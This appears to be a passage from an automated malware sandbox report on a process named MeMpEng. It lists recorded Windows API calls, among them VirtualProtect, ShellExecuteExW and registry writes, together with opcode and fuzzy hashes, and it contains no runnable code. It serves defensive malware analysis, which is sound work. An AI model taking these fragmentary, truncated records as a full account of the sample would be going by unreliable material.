                                                          • Source File: 00000014.00000002.502855776.000000006A2B1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6A2B0000, based on PE: true
                                                          • Associated: 00000014.00000002.502797249.000000006A2B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.503249218.000000006A2B4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.504512768.000000006A2B6000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_6a2b0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: cd7ce1be2094025ca93337a85225f503a1ca63428fb9bef759afd70ee0245fb2
                                                          • Instruction ID: 6b0ed6a1e33e64c6bbca01323b4ff34b7f4da2ba0c6070ad52bb835bf826bd0c
                                                          • Opcode Fuzzy Hash: cd7ce1be2094025ca93337a85225f503a1ca63428fb9bef759afd70ee0245fb2
                                                          • Instruction Fuzzy Hash: 6741AFF258430DEFCF299F64D889B5937B5EB0939DF6188A5E405CA501DF38D881CB90
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                            • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: 874a48f5052de35ce3f5d68bebafa1d1d6b4bc0d038a260f4494356ae22f2f83
                                                          • Instruction ID: d8afcb7e31c577c7df5a47bf7b189458025ebbcb83da75e60b69e678f76aa364
                                                          • Opcode Fuzzy Hash: 874a48f5052de35ce3f5d68bebafa1d1d6b4bc0d038a260f4494356ae22f2f83
                                                          • Instruction Fuzzy Hash: E8E06D71904104AADB00EFA5AE498AE77B9EB80349B20443FF101B00E9C67859109A3D
                                                          APIs
                                                          • WritePrivateProfileStringW.KERNEL32 ref: 0040240E
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: 05d014058449bd4b547e5342c092477e81e00b6c136499da1acfa5e54e0b5503
                                                          • Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
                                                          • Opcode Fuzzy Hash: 05d014058449bd4b547e5342c092477e81e00b6c136499da1acfa5e54e0b5503
                                                          • Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: PathSearch
                                                          • String ID:
                                                          • API String ID: 2203818243-0
                                                          • Opcode ID: 90ae4191cc2eee50ed17e5dc204d1be3e337bf975627a90f163dd72e6c21e694
                                                          • Instruction ID: 5ef6c9dc075d7657941f8fe9075485116ee4ddb5350d9d3ef67c2e6f18a0d880
                                                          • Opcode Fuzzy Hash: 90ae4191cc2eee50ed17e5dc204d1be3e337bf975627a90f163dd72e6c21e694
                                                          • Instruction Fuzzy Hash: 6FE04871204101AAE700DB94DD49EAF7768DF50358F20813BE511A60D1E6B49914972D
                                                          APIs
                                                          • RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00406418
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                          • Instruction ID: 1ec48b264e911f442ad562827ea2aeba8bdc9c692846981259ff7ce92a87d17c
                                                          • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                          • Instruction Fuzzy Hash: 60E0BF72110109BFEF095F90DD0AD7B761DE704210B01452EF906D4051E6B5A9305674
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060DB
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                          • Instruction ID: 1a6ac9c2f17c3bf7024e7b579d6ce6ab3b84958f313ea5b4b1ce89539a84cc3a
                                                          • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                          • Instruction Fuzzy Hash: 55E0EC3225026AABDF10DE55DC00EEB7BACEB053A0F018437F956E7150DA31E93197A8
                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 0040610A
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                          • Instruction ID: 280cd4c212b49affc14266408846aa3a30e7e9a640caac8a44b81d30c287abca
                                                          • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                          • Instruction Fuzzy Hash: E1E08C3221025AABCF109E908C01EEB7B6CEB043A0F014433FD16EB051D230E8319BA8
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(6A2B505C,00000004,00000040,6A2B504C), ref: 6A2B2A9D
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502855776.000000006A2B1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6A2B0000, based on PE: true
                                                          • Associated: 00000014.00000002.502797249.000000006A2B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.503249218.000000006A2B4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.504512768.000000006A2B6000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_6a2b0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: e1e82be2a783e6b4dba6e9194edca4bd2600222860e2e300b3af9c02b9aad6a2
                                                          • Instruction ID: 56092d6b3473f96f683b78d8f1e92c125eae4bd3377400146962b05024479db2
                                                          • Opcode Fuzzy Hash: e1e82be2a783e6b4dba6e9194edca4bd2600222860e2e300b3af9c02b9aad6a2
                                                          • Instruction Fuzzy Hash: 16F0A5B05C8384DFCB91CF28D4887093BF0BB1E34DB944D6AE24ADEA42E7348844CB91
                                                          APIs
                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          • Opcode ID: af8866ea374093282caf300f4873787412238c1fbfbe0191187a71e12ad24201
                                                          • Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
                                                          • Opcode Fuzzy Hash: af8866ea374093282caf300f4873787412238c1fbfbe0191187a71e12ad24201
                                                          • Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                          • Instruction ID: e359b3f9d4e5954a9af9fcfc08987e0780d6658b6568ce36bf776d9a1ed3ba47
                                                          • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                          • Instruction Fuzzy Hash: 5AD0123210020DBBDF115F90AD01FAB771DAB08310F014826FE17E40D0D775D530A7A4
                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 9d343ac4382d2e8cff30bc3796d860aaf3667ae62c4bad401f9ffbe6388ce1d7
                                                          • Instruction ID: 2b9d1094eaa3a8f74ec8242088029bd2eb80cc7fbaada08ad61a8f4613916ca8
                                                          • Opcode Fuzzy Hash: 9d343ac4382d2e8cff30bc3796d860aaf3667ae62c4bad401f9ffbe6388ce1d7
                                                          • Instruction Fuzzy Hash: 8BD05B72B08101D7DB00DBE89B48A9E77609B50368B30C53BD111F11E4D6B8C555A71D
                                                          APIs
                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404531
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
                                                          • Instruction ID: 80e323bcaa4fb1d2d6ad7f8777a1edc32b6b0207238f0482179e9273dd0660e4
                                                          • Opcode Fuzzy Hash: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
                                                          • Instruction Fuzzy Hash: 10C09BB57443007BDA149B509E45F17776467D4741F14C5797340F50F0C774E450D62C
                                                          APIs
                                                          • ShellExecuteExW.SHELL32(?), ref: 00405B89
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID:
                                                          • API String ID: 587946157-0
                                                          • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                          • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                          • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                          • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                                          • Instruction ID: c6ab7f6cffe81da1172822363f1dd48ca364d348eecf8336b79a6db78a7c4a26
                                                          • Opcode Fuzzy Hash: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                                          • Instruction Fuzzy Hash: 18B09235184A00ABDA515B00DE09F467B62E7A4701F008538B240640F0CBB200A0DB0A
                                                          APIs
